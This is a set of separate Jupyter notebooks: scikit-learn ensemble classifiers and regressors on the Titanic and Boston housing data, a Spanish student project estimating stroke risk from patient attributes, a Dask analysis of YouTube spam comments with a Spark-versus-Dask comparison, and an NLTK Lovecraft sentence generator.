train_df['Female'] = train_df["Sex"].apply(lambda x: 1 if x == 'female' else 0)
categories_pipe = Pipeline([
("Select", DataFrameSelector(["Pclass", "Female"])), # Selects Fields from dataframe
("MostFreqImp", MostFrequentImputer()), # Fill in NaN with most frequent
])
preprocessing_pipe = FeatureUnion(transformer_list = [
("numeric pipeline", numeric_pipe),
("categories pipeline", categories_pipe)
])
# Process Input Data Using Pipleines
train_X_data = preprocessing_pipe.fit_transform(train_df)
train_y_data = train_df["Survived"]
feature_names = ["Age", "Fare", "SibSp", "Parch", "Class", "Female"]
target_names = ["Died","Survived"]
```
## KNN Classifier Performance vs. Metrics (for comparison)
This example is included for comparison by showing the cross validation metric scores for a KNN classifier on the titanic data set.
```
from sklearn.neighbors import KNeighborsClassifier
# KNN Classifier 10-fold Validation
k=10
clf = KNeighborsClassifier(n_neighbors=k)
y_pred = cross_val_predict(clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Pecision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Bagging Example with KNN
This example implements a bagging classifier of 500 KNN classifiers with K=10. It then demonstrates the performance metrics for the algorithm under a 5-fold cross validation.
```
from sklearn.ensemble import BaggingClassifier
k=2
base_clf = KNeighborsClassifier(n_neighbors=k)
bag_clf = BaggingClassifier(
base_clf,
n_estimators = 500,
max_samples=0.5,
n_jobs = -1,
bootstrap=True)
y_pred = cross_val_predict(bag_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Pecision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Bagging with Decision Tree
This example implements a bagging classifier of 500 decision trees (constrained to a maximum depth of 10 each). It then demonstrates the performance metrics for the algorithm under a 5-fold cross validation.
```
from sklearn.tree import DecisionTreeClassifier
base_clf = DecisionTreeClassifier()
bag_clf = BaggingClassifier(
base_clf,
n_estimators = 500,
max_samples=0.5,
n_jobs = -1,
bootstrap=True)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(bag_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Pecision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Out of Bag Validation
This examples creates a bagging method ensemble classifier with decision trees up to depth 10. It is configured to output the oob_score, which is the cross validation score.
```
from sklearn.tree import DecisionTreeClassifier
k=10
base_clf = DecisionTreeClassifier(max_depth=10)
bag_clf = BaggingClassifier(
base_clf,
n_estimators = 500,
max_samples=0.5,
n_jobs = -1,
oob_score=True,
bootstrap=True)
bag_clf.fit(train_X_data, train_y_data)
bag_clf.oob_score_
```
## Random Forest Example
This examples creates a random forest of decision tree cassifiers of 500 estimators with a maximum depth limit of 10 for each.
The output shows the cross validation confusion matrix and the performance metrics.
```
from sklearn.ensemble import RandomForestClassifier
rf_clf = RandomForestClassifier(n_estimators=500, n_jobs=-1, max_depth=10)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(rf_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Pecision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Feature Importance and Out of Bag Validation for Random Forest
This example demonstrates a random forest classifier with the oob_score turned to true.
We output from it the importance score for each feature. We also output the out of bag cross validation score.
```
from sklearn.ensemble import RandomForestClassifier
rf_clf = RandomForestClassifier(n_estimators=500, n_jobs=-1, max_depth=10, oob_score=True)
rf_clf.fit(train_X_data, train_y_data)
for name, score in zip(feature_names, rf_clf.feature_importances_):
print(name, score)
print("\n\nOut of Bag Validation:", rf_clf.oob_score_)
```
## AdaBoost
This examples creates a Adaboost classifier ensemble of 100 decision trees using the SAMME.R algorithm and a learning rate of 1.0.
The output shows the cross validation confusion matrix and the performance metrics. Note the similar performance to the previous ensemble, but with lower precision and recall showing that the model is overfitting a bit.
```
# Adaboost goes here
from sklearn.ensemble import AdaBoostClassifier
ada_clf = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=1), n_estimators=100,
algorithm="SAMME.R", learning_rate=1.0)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(ada_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Pecision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Gradient Boost Decision Tree Classifier
This examples creates a Gradient Boosting Decision Tree Classifier classifier ensemble of decision trees with max depth=5 and 100 estimators in sequence.
The output shows the cross validation confusion matrix and the performance metrics.
```
from sklearn.ensemble import GradientBoostingClassifier
gb_clf = GradientBoostingClassifier(max_depth=5, n_estimators=100)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(gb_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Pecision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Gradient Boost Decision Tree Classifier with Early Stopping
This examples creates a Gradient Boosting Decision Tree Classifier classifier ensemble of decision trees of max depth = 5 and using early stopping to determine the number of estimators that produced the best results.
The output shows the cross validation confusion matrix and the performance metrics of a model with the optimal number of estimators.
```
from sklearn.ensemble import GradientBoostingClassifier
# Split the training into a training and validation set
X_train, X_val, y_train, y_val = train_test_split(train_X_data, train_y_data)
max_tree_depth=5
gb_clf = GradientBoostingClassifier(max_depth=max_tree_depth, n_estimators=1000)
gb_clf.fit(X_train, y_train)
errors = [mean_squared_error(y_val, y_pred)
for y_pred in gb_clf.staged_predict(X_val)]
bst_n_estimators = np.argmin(errors)
print("Best Number of Estimators:" + str(bst_n_estimators))
gb_clf = GradientBoostingClassifier(max_depth=max_tree_depth, n_estimators=bst_n_estimators)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(gb_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Pecision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
# Boston Housing Cost Estimator
Building off the classifier examples above, this section shows ensemble regressors using bagging and random forests.
## Setup
```
# Load Data Set
boston_housing_data = datasets.load_boston()
train_X, test_X, train_y, test_y = train_test_split(boston_housing_data.data,
boston_housing_data.target,
test_size=0.33)
def plot_learning_curves(model, X, y):
"""
Plots performance on the training set and testing (validation) set.
X-axis - number of training samples used
Y-axis - RMSE
"""
train_X, test_X, train_y, test_y = train_test_split(X, y, test_size = 0.20)
training_errors, validation_errors = [], []
for m in range(1, len(train_X)):
model.fit(train_X[:m], train_y[:m])
train_pred = model.predict(train_X)
test_pred = model.predict(test_X)
training_errors.append(np.sqrt(mean_squared_error(train_y, train_pred)))
validation_errors.append(np.sqrt(mean_squared_error(test_y, test_pred)))
plt.plot(training_errors, "r-+", label="train")
plt.plot(validation_errors, "b-", label="test")
plt.legend()
plt.axis([0, 80, 0, 3])
```
## Linear Regression on Boston Data Set (for comparison)
For comparison a linear regression on the boston data is shown.
```
from sklearn.linear_model import LinearRegression
lin_reg = LinearRegression()
lin_reg.fit(train_X,train_y)
pred_y = lin_reg.predict(test_X)
# Outputs the intercept and coefficient of the model (theta_0 and theta_1 respectively)
print("Theta:")
print(lin_reg.intercept_, lin_reg.coef_)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(lin_reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Bagging Regressor using Linear Regression as Base
This example implements a bagging regressor with a linear regression model as the base classifier. It shows the histogram of the price estimation error. It also shows the learning curve for the model.
```
## Bagging with Linear Regression
from sklearn.ensemble import BaggingRegressor
from sklearn.linear_model import LinearRegression
base_reg = LinearRegression()
bag_reg = BaggingRegressor(
base_reg,
n_estimators = 500,
max_samples=1.0,
n_jobs = -1,
bootstrap=False) #Not replacement for this configuration
bag_reg.fit(train_X, train_y)
pred_y = bag_reg.predict(test_X)
# Outputs the intercept and coefficient of the model (theta_0 and theta_1 respectively)
print("Theta:")
print(lin_reg.intercept_, lin_reg.coef_)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(lin_reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Random Forest Regression Example
This example implements a random forest regressor using decision trees up to depth 10. It shows the histogram of the price estimation error. It also shows the learning curve for the model.
```
from sklearn.ensemble import RandomForestRegressor
rf_reg = RandomForestRegressor(n_estimators=500, n_jobs=-1, max_depth=10)
rf_reg.fit(train_X, train_y)
pred_y = rf_reg.predict(test_X)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(rf_reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Random Forest Regressor: Feature Importance and Out of Bag Validation Score
This example shows a random forest regressor using decision trees constrained to a maximum depth of 10. Out of bag score is enabled.
```
from sklearn.ensemble import RandomForestRegressor
rf_reg = RandomForestRegressor(n_estimators=500, n_jobs=-1, max_depth=10, oob_score=True)
rf_reg.fit(train_X, train_y)
for name, score in zip(boston_housing_data.feature_names, rf_reg.feature_importances_):
print(name, score)
print("\n\nOut of Bag Validation:", rf_reg.oob_score_)
```
## AdaBoost Regression Example
Implmentation of an AdaBoost ensemble regressor with decision trees of max depth = 2 and 100 estimators in sequence. Learning rate is decreased to 0.2 to improve generalization.
This example implements an AdaBoost regressor. It shows the histogram of the price estimation error. It also shows the learning curve for the model.
```
from sklearn.ensemble import AdaBoostRegressor
from sklearn.tree import DecisionTreeRegressor
#Ada Boost Regressor
reg = AdaBoostRegressor(
DecisionTreeRegressor(max_depth=2),
n_estimators=100,
learning_rate=0.2)
reg.fit(train_X, train_y)
pred_y = reg.predict(test_X)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Gradient Boosting Regressor Example
This example implements an Gradient Boosting regressor. Its ensemble of 200 estimators are decision stumps.
It shows the histogram of the price estimation error. It also shows the learning curve for the model.
```
from sklearn.ensemble import GradientBoostingRegressor
reg = GradientBoostingRegressor(max_depth=1, n_estimators=50)
reg.fit(train_X, train_y)
pred_y = reg.predict(test_X)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Gradient Boosting Regressor Example with early stopping
This example implements an Gradient Boosting regressor with early stopping enabled. It shows the histogram of the price estimation error. It also shows the learning curve for the model.
```
from sklearn.ensemble import GradientBoostingRegressor
# Split the training into a training and validation set
X_train, X_val, y_train, y_val = train_test_split(train_X_data, train_y_data)
max_tree_depth=1
reg = GradientBoostingRegressor(max_depth=max_tree_depth, n_estimators=1000)
reg.fit(X_train, y_train)
errors = [mean_squared_error(y_val, y_pred)
for y_pred in reg.staged_predict(X_val)]
bst_n_estimators = np.argmin(errors)
print("Best Number of Estimators:" + str(bst_n_estimators))
reg = GradientBoostingRegressor(max_depth=max_tree_depth, n_estimators=bst_n_estimators)
##
reg.fit(train_X, train_y)
pred_y = reg.predict(test_X)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(reg, train_X, train_y)
plt.axis([0,300,0,10])
```
|
github_jupyter
|
<img style="float: left; margin: 30px 15px 15px 15px;" src="https://pngimage.net/wp-content/uploads/2018/06/logo-iteso-png-5.png" width="300" height="500" />
### <font color='navy'> Simulación de procesos financieros.
**Nombres:** Ana Esmeralda Rodriguez Rodriguez, Antonio de Santiago Rosas Saldaña.
**Fecha:** 09 de marzo del 2021.
**Expediente** : If709288, Af713803.
**Profesor:** Oscar David Jaramillo Zuluaga.
**Link Github**: Lhttps://github.com/Tonydesanty/Proyecto-entrega-1/blob/main/Entrega%201%20proyecto.ipynb
# Proyecto TEMA-2
**Introducción:**
Hoy en día existen diferentes tipos de enfermedades letales como el cáncer, coronavirus, diabetes, entre otros. Nuestro proyecto va a ir enfocado a los accidentes cerebrovasculares, el cual ocupa el segundo puesto de las enfermedades más mortales de la actualidad.
Una lesión cerebrovascular es un tipo de lesión que se hace presente cuando el flujo sanguíneo del cerebro se detiene parcialmente. Cuando el flujo sanguíneo en el cerebro se detiene, el cerebro deja de recibir la oxigenación y los nutrientes que requiere para su funcionamiento y las células y neuronas comienzan a morir de manera rápida.
Factores que pueden influir a tener un accidente cerebrovascular:
• Presión arterial alta.
• Diabetes.
• Enfermedades en el corazón.
• Fumar.
• Genética.
• Edad.
• Consumo de alcohol.
• Consumo de drogas.
• Colesterol.
• Obesidad.
**Objetivo general:**
Crear un modelo el cuál nos de un diagnostico si una persona es poseedora de una enfermedad cerebrovascular.
**Objetivos secundarios:**
1.Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su edad.
2.-Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su nivel de masa corporal.
3.- Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por su nivel de glucosa.
4.- Encontrar mediante las simulación montecarlo la probabilidad de que una persona contraiga una enfermedad cerebrovascular por tener la costumbre de fumar.
**Definición del problema**:
Las enfermedades son algo natural dentro del ciclo de vida de una persona, existen diferentes enfermedades que contrae la gente, ya sea por sus hábitos, estado psicologico, o edad. Las enfermedades cerebrovasculares son un problema en la actualidad ya que son la segunda enfermedad con mayor tasa de mortalidad, despúes de la cardipatía isquémica.
Crear un modelo que nos ayude a encontrar la probabilidad que una persona contraiga en un futuro una enfermedad cerbrovascular sería muy interesante, ya que, podremos pronosticar si una persona podría a llegar a tener una enfermedad de este tipo con caracteristicas como edad y su índice de masa corporal, y así adelantarnos a los hechos y poder tomar decisiones para poder reducir la probabilidad de contraer esta enfermedad.
A través de una base de datos obtenida de "https://www.kaggle.com/fedesoriano/stroke-prediction-dataset?select=healthcare-dataset-stroke-data.csv" trabajaremos para poder crear un modelo el cuál nos permita predecir si una persona con ciertas caractericticas puede llegar a ser poseedora de una enfermedad cerebrovascular.
**Nodos a simular:**
*Probabilidad de contraer por su edad*: Decidimos simular está variable porque consideramos que la edad o el estado del cuerpo tiene gran impacto al momento de contraer enfermedad, a mayor edad, mayor posibilidad de contraer enfermedades.
*Probabilidad de contraer por su índice de masa corporal:* La masa corporal de las personas es un indicador de salud, normalmente las personas con mayor masa corporal son las más propensas a contraer enfermedades, por lo que tomar este indicador como nodo es muy importante ya que creemos que puede a llegar a influir de manera considerable en nuestros resultados.
*Probabildiad de contraer por sus habitos con el cigarro*: Los cigarros son nido de varias enfermedades, por lo que es interesante saber cuál es la probabilidad de contrarer la enfermedad por tus hábitos con el cigarro.
*Probabilidad mediante su nivel de glucosa*: La gluscosa es un indicador de cuanta azúcar tenemos dentro de nuestro cuerpo, tener un nivel de azúcar regulado es lo más optimo, sin embargo, cuando esta sube o baja son indicadores de que puedes tener enfermedades como diabetes, analizar esta variable puede llegarnos a dar un resultado más aproximado del cual queremos llegar.
**Hipotesis**
Las personas más probables de contraer enfermedades cerebrovasculares son aquellas que tienen más de 70 años, fuman, tienen un alto índice de masa corporal y nivel de glucosa bajo.
*Supuestos:*
Las variables que simularemos son las más significativas al momento del estudio de esta enfermedad.
Toda la información proporcionada por los pacientes son 100% reales.
Otro tipo de enfermedades no tienen un peso relativo dentro del estudio.
Las variables a analizar no tienen precedentes importante (En caso de masa corporal y glucosa).
Las variables tienen el mismo peso al momento de presentar resultados.

## Visualización de datos
```
#Librerias
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
import collections
import scipy.stats as st
from collections import Counter
from statsmodels.nonparametric.kernel_density import KDEMultivariate
# funcion que retorna una funcion de densidad de probabilidad de un conjunto de datos
def kde_statsmodels_mf(x, **kwargs):
"""Multivariate Kernel Density Estimation with Statsmodels"""
kde = KDEMultivariate(x,
bw='cv_ml',
var_type='c', **kwargs)
return lambda x_grid: kde.pdf(x_grid)
data = pd.read_csv('healthcare-dataset-stroke-data.csv')
data
clean_data = pd.DataFrame()
# Filtrar las variables a analizar
clean_data['age'] = data.T.loc['age']
clean_data['smoking_status'] = data.T.loc['smoking_status']
clean_data['bmi'] = data.T.loc['bmi']
clean_data['wor_type'] = data.T.loc['work_type']
# Invertir datos para tener los valores iniciales al principio
clean_data = clean_data.iloc[::-1]
# Reemplazar index por uno que tenga los vlores de forma descendiente
clean_data['index'] = [i for i in range(len(clean_data['age']))]
clean_data.set_index('index', inplace = True)
# Eliminar hasta primer positivo
clean_data = clean_data.iloc[37:,:]
# llenar valores nulos
clean_data.fillna(0,inplace = True)
# Mostrar la cola del data frame
clean_data
```
## Edad
```
totalages = clean_data['age']
totalages.head()
# plotear histograma de los datos
J = 10 # Cantidad de particiones del histograma
[freq, x_hist, _] = plt.hist(totalages,bins = J, density = True ); # histograma
plt.show() # mostrar histograma
x_hist = x_hist[1:] # Se obvia el último valor de x para obtener exactamente J muestras de x
age = totalages
# Probar diferentes distirbuciones de probabilidad
dist_list = ['bradford', 'beta','expon', 'exponnorm','norm','uniform','foldnorm', 'gennorm', 'ksone', 'kappa4', 'johnsonsb']
y_real, x_real, _ = plt.hist(age, bins = 15, density = True) #hacer histograma
x_real = x_real[1:] # modificar shape para que rea igual
#e = []
def distribucion(dist_list):
def imprimir(dist):
param = getattr(st, dist).fit(age)
y_est = getattr(st, dist).pdf(x_real, *param)
plt.plot(x_real,y_est, label = dist);
print('El error de la distribucion', dist,'es de', (abs(y_real-y_est)*100/y_est).mean(),'%')
[imprimir(dist) for dist in dist_list]
distribucion(dist_list)
plt.legend()
plt.show()
param = getattr(st, 'ksone').fit(x_hist) # obtener los parametros
pi = st.ksone.pdf(x_hist, *param)
# Cálculo de la esperanza usando la expresión teórica
Ei = x_hist*pi
# Cálculo teórico de la chi cuadrada
x2 = ((freq - Ei)**2 / Ei).sum()
print('Valor de chi cuadrado teorico = ', x2)
# Cálculo usando la librería estadística de la chi cuadrada
X2 = st.chisquare(freq, Ei)
print('Valor de chi cuadrado librería = ', X2)
# Cálculo de Grados de libertad del estadístico
m = J-1 # grados de libertad
Chi_est = st.chi2.ppf(q=0.95, df=m)
print('Estadístico de chi_cuadrado = ', Chi_est)
func_edad = kde_statsmodels_mf(age)
x_g = np.arange(0,100,100)
plt.figure()
plt.plot(x_g,func_edad(x_g));
plt.hist(edad,bins = 15, density = True);
plt.show()
f = func_edad
# encontrar el maximo de la funcion y plotearlo
x = np.arange(0,10000,100)
max_fp = f(optimize.fmin(lambda x:-f(x),0,disp=False))
plt.plot(0,max_fp,'x',lw = 10)
plt.plot(x,func_edad(x))
```
## Funciones a utilizar
```
# Función de aceptación y rechazo usando una constante para t(x) y se desea que dicha función regrese
# N variables aleatorias (Exactamente que acepte N valores)
def acep_rechazo_simplificada(
N:'Cantidad de variables a generar',
Dom_f:'Dominio de la función f como tupla (a,b)',
f:'función objetivo a generar',
max_f:'máximo valor de f'
):
X = np.zeros(N)
return X
def histograma_vs_densidad(signal:'variable con muestras aleatorias de la distribución generada',
f:'función de distribución de probablidad f(x) de la variable aleatoria'):
plt.figure(figsize=(8,3))
count, x, _ = plt.hist(signal,100,density=True)
y = f(x)
plt.plot(x, y, linewidth=2,color='k')
plt.ylabel('Probabilidad')
plt.xlabel('Muestras')
# plt.legend()
plt.show()
def Gen_distr_discreta(p_acum: 'P.Acumulada de la distribución a generar',
indices: 'valores reales a generar aleatoriamente',
N: 'cantidad de números aleatorios a generar'):
U =np.random.rand(N)
# Diccionario de valores aleatorios
rand2reales = {i: idx for i, idx in enumerate(indices)}
# Series de los valores aletorios
y = pd.Series([sum([1 for p in p_acum if p < ui]) for ui in U]).map(rand2reales)
return y
def plot_histogram_discrete(distribucion:'distribución a graficar histograma',
label:'label del legend'):
# len(set(distribucion)) cuenta la cantidad de elementos distintos de la variable 'distribucion'
plt.figure(figsize=[8,4])
y,x = np.histogram(distribucion,density = True,bins = len(set(distribucion)) - 1)
plt.bar(list(set(distribucion)),y,label=label)
plt.legend()
plt.show()
```
## Nodo 1 "Edad"
```
edad = data['age']
print('La media de tener un problema cerebrovascular es de:', edad.mean())
plt.hist(edad, density=True, bins=82)
plt.xlabel('Rango ')
plt.ylabel('Frecuencia')
plt.title('Edad del Paciente')
plt.show()
#Calculo de probabilidad
lista_edad=pd.DataFrame(edad)
cantidad_edad = pd.value_counts(lista_edad["age"])
cantidad_edad
#robabilidad_edad=pd.DataFrame((cantidad_edad/5110)*100)
#robabilidad_edad
#Age.sort_index().head(83)
#dad_acumulada=np.cumsum(probabilidad_edad)
#dad_acumulada
proba_edad= ((cantidad_edad/5110)*100)
proba_edad
acumulada_edad = np.cumsum(proba_edad)
acumulada_edad
info= pd.DataFrame({'Cantidad por edad':cantidad_edad, 'Probabilidad por edad':proba_edad, 'Probabilidad acumulada': acumulada_edad})
info
# nombrar variable que contenga datos del df determinados
total_age = info['cantidad por edad']
total_age.head()
```
## Nodo 2 "Masa"
```
masa = data['bmi']
print('La media de tener un problema cerebrovascular es de:', masa.mean())
plt.hist(masa, density=True, bins=20)
plt.xlabel('Rango ')
plt.ylabel('Frecuencia')
plt.title('Masa muscular del paciente')
plt.show()
lista_masa=pd.DataFrame(masa)
cantidad_masa = pd.value_counts(lista_masa["bmi"])
cantidad_masa
proba_masa= ((cantidad_masa/4909)*100)
proba_masa
acumulada_masa = np.cumsum(proba_masa)
acumulada_masa
info_masa= pd.DataFrame({'Cantidad por masa':cantidad_masa, 'Probabilidad por masa':proba_masa, 'Probabilidad acumulada masa': acumulada_masa})
info_masa
```
## Nodo 3 "Fumar"
**Para el caso del nodo "Fumar" se van a tener estos códigos:**
0.- No se sabe si el paciente fuma o no.
1.- Fuma de vez en cuando.
2.- Nunca ha fumado.
3.- Fuma
```
fuma = data['smoking_status']
print('La media de tener un problema cerebrovascular es de:', masa.median())
plt.hist(fuma, density=True, bins=4)
plt.xlabel('Rango ')
plt.ylabel('Frecuencia')
plt.title('Costumbres de fumar del paciente')
plt.show()
lista_fuma=pd.DataFrame(fuma)
cantidad_fuma = pd.value_counts(lista_fuma["smoking_status"])
cantidad_fuma
proba_fuma= ((cantidad_fuma/5110)*100)
proba_fuma
acumulada_fuma = np.cumsum(proba_fuma)
acumulada_fuma
info_fuma= pd.DataFrame({'Cantidad por fumar':cantidad_fuma, 'Probabilidad por fumar':proba_fuma, 'Probabilidad acumulada fuma': acumulada_fuma})
info_fuma
```
## Nodo 3 "Glucosa"
```
glucosa = data['avg_glucose_level']
print('La media de tener un problema cerebrovascular es de:', glucosa.mean())
plt.hist(glucosa, density=True, bins=20)
plt.xlabel('Rango ')
plt.ylabel('Frecuencia')
plt.title('Glucosa del paciente')
plt.show()
lista_glucosa=pd.DataFrame(glucosa)
cantidad_glucosa = pd.value_counts(lista_glucosa["avg_glucose_level"])
cantidad_glucosa
proba_glucosa= ((cantidad_glucosa/5110)*100)
proba_glucosa
acumulada_glucosa = np.cumsum(proba_glucosa)
acumulada_glucosa
```
## Nodo 4 "Por tipo de trabajo"
**Códigos para tipo de trabajo:**
0.- Niños.
1.- Trabajo en el gobierno
2.- Nunca ha trabajado
3.- Privado
4.- Autoempleado
```
trabajo = data['work_type']
print('La media de tener un problema cerebrovascular es de:', trabajo.median())
plt.hist(trabajo, density=True, bins=5)
plt.xlabel('Rango ')
plt.ylabel('Frecuencia')
plt.title('Tipo de trabajo del paciente')
plt.show()
lista_trabajo=pd.DataFrame(trabajo)
cantidad_trabajo = pd.value_counts(lista_trabajo["work_type"])
cantidad_trabajo
proba_trabajo= ((cantidad_trabajo/5110)*100)
proba_trabajo
acumulada_trabajo = np.cumsum(proba_trabajo)
acumulada_trabajo
info_trabajo= pd.DataFrame({'Cantidad por trabajo':cantidad_trabajo, 'Probabilidad por trabajo':proba_trabajo, 'Probabilidad acumulada trabajo': acumulada_trabajo})
info_trabajo
```
|
github_jupyter
|
```
import dask.dataframe as dask
dask_df = dask.read_csv("*.csv")
dask_df
dask_df.head()
# Elnino Melendez sounds like she has some real wholesome, family-friendly content on her channel
dask_df.count().compute()
dask_df.columns
len(dask_df)
# Looks like 1956 instances (rows) and 5 features (columns)
dask_df['CLASS'].value_counts().compute()
# Looks like 1005 instances of spam and 951 of non-spam
dask_df['CONTENT'].str.lower().compute()[1:5]
spam = dask_df[(dask_df['CLASS'] == 1)].compute()
spam
len(spam)
# The 1005 spam comments
spam['CONTENT'].str.lower().str.contains('check').value_counts()
high_quality_non_spam_content = dask_df[(dask_df['CLASS'] == 0)].compute()
high_quality_non_spam_content
high_quality_non_spam_content['CONTENT'].str.lower().str.contains('check').value_counts()
# Yep. Looks like saying "Check out ....!" is a dead giveaway
# Instead, maybe they should utilize a colloquialism like "Take a gander at ...!"
high_quality_non_spam_content['CONTENT'].str.lower().str.contains('gander').value_counts()
spam['CONTENT'].str.lower().str.contains('gander').value_counts()
# Yep, looks like they just need to switch up their vernacular a bit
import matplotlib.pyplot as plt
import numpy as np
dask_df['dt'] = dask_df['DATE'].astype('M8[M]')
dask_df.head()
sorted_df = dask_df.set_index(['dt']).compute()
# Well, I was going to sort the values by month and then see how the spam counts changed over time
# but, it looks like sorting in dask takes a bit more time than I want to give it right now
```
# Big Data Options
Considerations in Spark vs Dask
'
Common considerations in determining whether Spark or Dask is more appropriate in a given situation often come down to personal preference and experience, though there are a few functional restrictions in choosing one over the other. Among the initial considerations in choosing one over the other will be one's experience in python and potential prior experience in languages such as SQL or Scala. Dask is written and runs exclusively in python. Though this may sound restrictive, I appreciate the familiarity as Python is the language in which I have the greatest degree of experience. Because Dask uses the Pandas APIs, working with a Dask dataframe is only minimally different from a typical pandas dataframe. Spark, however, is written in Scala but provides support for both python and R while providing a moderately intuitive level of familiarity to those with experience in SQL. Rather than using APIs from a different language, as is the case with Dask and Pandas, Spark has its own set of APIs. Again, given my familiarity with python and Pandas, Dask continues to be my high-level, big data tool of choice.
|
github_jupyter
|
```
import nltk
import re
import operator
from collections import defaultdict
import numpy as np
import matplotlib.pyplot as plt
```
The idea is generate more common sentences according to their word tagging. So the sentences will have the real structure written by lovecraft and composed by a list of most common words in that kind of sentence.
The result should be a somewhat real phrase.
```
lovecraft = nltk.corpus.PlaintextCorpusReader("lovecraft", ".*")
class TaggedWord(object):
def __init__(self, words, count):
self.word_hash = {}
self.words = words
self.count = count
index = 0
for word in words:
self.word_hash[word] = index
index += 1
def update(self, word):
word_index = self.word_hash.get(word)
if word_index is not None:
self.count[word_index] += 1
else:
self.words.append(word)
self.count.append(1)
word_index = len(self.words) - 1
self.word_hash[word] = word_index
def get_random(self, seed):
np.random.seed(seed=seed)
total_count = sum(self.count)
probabilities = [word_count/total_count for word_count in self.count]
random_word_chose = np.random.multinomial(1, probabilities)
random_word_index = list(random_word_chose).index(1)
return self.words[random_word_index]
class Sentence(object):
def __init__(self, words, tags):
self.tags = tags
self.words = []
for word in words:
self.words.append(TaggedWord(words=[word.lower()], count=[1]))
def update(self, words):
word_index = 0
for word in words:
self.words[word_index].update(word.lower())
word_index += 1
def generate(self, seed):
return [word.get_random(seed) for word in self.words]
lovecraft_sentences = lovecraft.sents()
sentences = {}
sentence_count = defaultdict(int)
for tokenized_sentence in lovecraft_sentences:
sentence_with_tagged_words = nltk.pos_tag(tokenized_sentence)
sentence_words = list(zip(*sentence_with_tagged_words))[0]
sentence_tags = list(zip(*sentence_with_tagged_words))[1]
sentence_checksum = "-".join(sentence_tags)
if sentence_checksum in sentences:
sentences[sentence_checksum].update(sentence_words)
else:
sentences[sentence_checksum] = Sentence(words=sentence_words, tags=sentence_tags)
sentence_count[sentence_checksum] += 1
total_count = sum(sentence_count.values())
sentence_tags = [_sentence_tags for _sentence_tags in sentences.keys()]
sentence_probabilities = [sentence_count[sentence_tag]/total_count for sentence_tag in sentence_tags]
for i in range(0, 3):
random_sentence_chose = np.random.multinomial(1, sentence_probabilities)
random_sentence_index = list(random_sentence_chose).index(1)
